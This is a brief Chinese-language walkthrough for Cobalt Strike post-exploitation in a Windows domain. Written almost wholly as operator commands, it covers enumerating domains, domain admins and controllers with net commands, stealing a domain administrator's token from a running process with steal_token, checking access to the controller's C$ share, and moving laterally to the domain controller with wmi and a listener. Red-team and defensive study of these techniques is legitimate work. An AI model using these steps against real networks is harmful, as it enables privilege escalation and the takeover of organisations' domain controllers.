cobalt strike
cobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。
前期准备
获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。
域内收集信息
通过一些cmd命令,可以收集到域内的信息
在cs的会话中,执行命令
查看有多少域和工作组
shell net view /domain
查看域管理员
shell net group "domain admins" /domain
查看域控制器
shell net group "domain controllers" /domain
查看时间服务器,一般是主域
shell net time /domain
获取域控权限
查看进程,同时观察每个进程的用户
ps
或者使用
shell tasklist /v
如果发现某些进程的用户为域管理员
可以通过以下方式,来获取域管理员权限
steal_token pid(进程的pid)
命令成功之后,验证一下能否连接共享文件
shell dir \\test.domain.com\c$
还可以查看当前的权限
getuid
获取域控的会话,远程连接
wmi test.domain.com listenername(监听的名字)
执行成功后,可以发现域控制器已经上线